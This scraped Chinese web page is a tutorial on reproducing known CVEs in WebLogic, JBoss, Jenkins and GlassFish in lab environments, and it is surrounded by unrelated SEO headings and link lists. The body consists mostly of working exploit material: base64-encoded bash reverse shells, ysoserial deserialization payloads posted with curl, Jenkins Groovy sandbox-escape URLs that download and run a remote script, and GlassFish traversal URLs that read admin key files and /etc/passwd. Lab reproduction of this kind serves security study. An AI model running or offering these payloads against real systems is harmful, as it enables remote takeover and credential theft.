当前位置: 首页 > news >正文

一站式做网站系统wordpress取消邮箱验证

一站式做网站系统,wordpress取消邮箱验证,合肥市住房和建设局网站,仓储服务 东莞网站建设 技术支持目录 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现中间件-Weblogic安全问题漏洞复现CVE_2017_3506漏洞复现 中间件-JBoos安全问题漏洞复现CVE-2017-12149漏洞复现CVE-2017-7504漏洞复现 中间件-Jenkins安全问题漏洞复现CVE-2017-1000353漏… 目录 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现中间件-Weblogic安全问题漏洞复现CVE_2017_3506漏洞复现 中间件-JBoos安全问题漏洞复现CVE-2017-12149漏洞复现CVE-2017-7504漏洞复现 中间件-Jenkins安全问题漏洞复现CVE-2017-1000353漏洞复现CVE-2018-1000861漏洞复现 中间件-Glassfish安全问题漏洞复现CVE-2017-1000028漏洞复现 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现 中间件及框架列表 IISApacheNginxTomcatDockerWeblogicJBoosWebSphere Jenkins GlassFishJiraStruts2LaravelSolrShiroThinkphp SpringFlaskjQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试 1、配置不当-解析弱口令 2、安全机制-特定安全漏洞 3、安全机制-弱口令爆破攻击 4、安全应用-框架特定安全漏洞 中间件安全测试流程 1、判断中间件信息-名称版本三方 2、判断中间件问题-配置不当公开漏洞 3、判断中间件利用-弱口令EXP框架漏洞 应用服务安全测试流程 1、判断服务开放情况-端口扫描组合应用等 2、判断服务类型归属-数据库文件传输通讯等 3、判断服务利用方式-特定漏洞未授权弱口令等 中间件-Weblogic安全问题 详解weblogic详解 介绍 Java应用服务器软件 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 探针默认端口7001Weblogic是Oracle公司推出的J2EE应用服务器 安全问题 CVE_2017_3506 CVE_2018_2893 CVE_2018_3245 CVE-2018-2628 反序列化 CVE_2020_14882 CVE_2021_2394 反序列化 CVE-2023-21839 反序列化 … 以上的漏洞基本都可以使用现成熟的工具进行直接攻击利用。 漏洞复现 以CVE_2017_3506为例其他编号漏洞利用基本类似直接上工具点一点~ CVE_2017_3506漏洞复现 靶场vulfocus 开启环境 访问 直接将url信息放入到工具当中进行检测 存在漏洞可直接进行命令执行 其他漏洞编号利用方式类似直接放入到工具当中进行检测存在就存在可直接执行命令或者上传注入等操作。 手工操作复现weblogic反序列漏洞复现 中间件-JBoos安全问题 详解Jboss详解 介绍 J2EE的开放源代码的应用服务器 是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器一般与Tomcat或Jetty绑定使用。 Jboss通常占用的端口是10981099444444458080800980838093这 几个Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 安全问题 CVE-2017-12149 CVE-2017-7504 弱口令 未授权访问 … 漏洞复现 CVE-2017-12149漏洞复现 该漏洞为 Java反序列化错误类型存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化从而导致了漏洞。 靶场vulhub 参考JBoss 5.x/6.x 反序列化漏洞 开启环境 访问 漏洞利用 payload //反弹shell命令 sh -i /dev/tcp/192.168.100.1/8888 01 //base64加密后 bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} //ysoserial工具利用 java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} poc.ser //curl命令进行请求访问发送 curl http://192.168.100.134:8080/invoker/readonly --data-binary poc.ser //接收端开启监听 nc -lvvp 8888在ysoserial工具目录下生成了poc.ser文件 发送curl请求 监听端成功接收反弹shell成功 CVE-2017-7504漏洞复现 介绍 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 靶场vulhub 参考JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 开启环境 访问 漏洞利用 //此漏洞和CVE-2017-12149利用方式差不多区别就是请求地址内容不同 payload: //反弹shell命令 sh -i /dev/tcp/192.168.100.1/8888 01 //base64加密后 bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} //ysoserial工具利用 java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} poc.ser //进行curl请求 curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary poc.ser //接收端开启监听 nc -lvvp 8888发送curl请求 监听端成功接收反弹shell成功 中间件-Jenkins安全问题 详解Jenkins详解 介绍 开源软件项目 Jenkins是一个开源软件项目是基于Java开发的一种持续集成工具用于监控持续重复的工作旨在提供一个开放易用的软件平台使软件项目可以进行持续集成。 探针默认端口8080 安全问题 CVE-2017-1000353 CVE-2018-1000861 … 漏洞复现 CVE-2017-1000353漏洞复现 靶场vulfocus 或vulhub 参考Jenkins-CI 远程代码执行漏洞 vulhub环境 vulfocus环境 开启靶场 访问: 漏洞利用 工具地址CVE-2017-1000353 JDK版本需要为jdk-8u291其他版本可能失效无法复现成功 下载地址JDK8 payload //执行命令创建文件 java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser touch /123.txt //执行exp python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser//然后回到我们的靶机中打开终端输入以下命令查看验证是否利用成功 docker ps -a docker exec -it 838723a23ad0 /bin/bash ls /反弹shell命令 sh -i /dev/tcp/192.168.100.1/8888 01 //base64加密后 bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}//反弹shell操作 //将刚刚执行创建文件的命令换成该反弹shell命令即可base64加密后的 java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} //执行exp python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser//接收端开启监听 nc -lvvp 8888注意JDK版本否则可能无法复现。 CVE-2018-1000861漏洞复现 靶场vulhub 参考Jenkins远程命令执行漏洞 开启环境 访问 漏洞利用 exp下载地址CVE-2018-1000861EXP //使用exp脚本可直接利用python2下使用 payload python2 exp.py python2 exp.py http://192.168.100.134:8080/ touch /tmp/123.txt python2 exp.py http://192.168.100.134:8080/ touch /tmp/test.txt//进入靶场环境进行验证 docker ps docker exec -it 靶场id /bin/bash ls /tmp/使用说明 使用方式 验证是否成功 成功创建文件 还可以进行手工测试 手工检测 poc http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}} payload: 创建文件 //发送以下请求 http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}验证 成功创建 反弹shell payload //反弹shell命令进行base64加密 python2 exp.py http://192.168.100.134:8080 bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} //接收端开启监听 nc -lvvp 8888成功反弹shell ps:如果不能反弹可在服务端创建文本文件将反弹shell命令写进文本文件当中。然后python开启http服务,观察状态。 //开启http服务 python -m http.server 8080//python2执行exp脚本将远程文件保存至目标主机 python2 exp.py 目标主机 curl -o /tmp/cmd.sh http://xxxx:8080/cmd.txt//python2执行exp脚本使目标主机运行脚本文件反弹shel python2 exp.py 目标主机 bash /tmp/cmd.shhttp服务端可观察状态 进入靶场验证存在该文件 接下来使用python2脚本exp命令进行执行即可。 还可以手工浏览器访问依次执行 payload //这里拿本地演示 //将文件保存到目标主机 //http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){curl -o /tmp/cmd.sh http://VPSip:8888/cmd.txt.execute()}} http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt.execute()}}//执行shell脚本 //http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){bash /tmp/cmd.sh.execute()}} http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){bash /tmp/cmd.sh.execute()}}访问时浏览器变为空白界面 执行成功 中间件-Glassfish安全问题 介绍 GlassFish详解 一款商业应用服务器 GlassFish 是一款强健的商业兼容应用服务器达到产品级质量可免费用于开发、部署和重新分发。开发者可以免费获得源代码还可以对代码进行更改。 安全问题 CVE-2017-1000028 … 漏洞复现 CVE-2017-1000028漏洞复现 漏洞原理 java语言中会把%c0%ae解析为\uC0AE最后转义为ASCCII字符的.点。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转达到目录穿越、任意文件读取的效果。 靶场vulhub 参考GlassFish 任意文件读取漏洞 开启环境 进入环境访问 环境运行后访问http://your-ip:8080和http://your-ip:4848即可查看web页面。其中8080端口是网站内容4848端口是GlassFish管理中心。 payload: //读取密码 https://192.168.100.134:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile//linux下读取文件 https://192.168.100.134:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd//window下读取文件 http://you-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini成功读取密码 成功读取文件
http://www.hkea.cn/news/14491801/

相关文章:

  • html5怎么做二手网站黄页88网注册
  • 新乡网站建设设计公司哪家好wordpress查看自己网站的ip量
  • 通辽网站开发招聘网页版微信登录入口密码登录
  • 做系统网站赚钱中国作风建设门户网站
  • asp网站怎么运行40个常见的html标签及含义
  • 找制作网站公司河北秦皇岛黄金海岸
  • 汕头网站建设制作公司平台及服务是什么
  • 托里县城乡建设局网站网站建设 案例展示
  • 电子手表网站wordpress打开只显示代码
  • 天津手动网站建设调试亿网域名
  • 推广网站的步骤电子商务网站建设毕业设计
  • ui设计在哪个网站可以接做校园网站建设申请报告
  • 过期域名查询网站网站建设 三合一
  • 门户网站后台管理模板wordpress 添加证书
  • 深圳化妆品网站建设万网的网站怎么建设
  • 强化门户网站建设网站编辑是什么
  • 学做吃的网站有哪些做个小型购物网站要多少钱
  • 企业网站选择第三方还是自己做开网店需要多少资金
  • 南昌seo网站开发推广网站的方式
  • 网站建设费用如何做账想创建一个网站
  • 万网虚拟空间 asp.net多网站部署苏州企业建设网站服务
  • app设计网站有哪些功能视频号推广入口
  • qingdao城乡住房建设厅网站建设一网站有什么用
  • 徐州住房和城乡建设局网站广州网络科技有限公司
  • 聊城网站优化技术什么网站可以做软件有哪些
  • 网站后台示演惠州网站建设设计
  • 网站数据分析报告网络数据分析
  • 做h5好的网站关于网页设计的论文范文
  • 如何做关于旅游的网站页面陕西网站制作公司哪家好
  • 联盟网站制作哪个网站做的w7系统好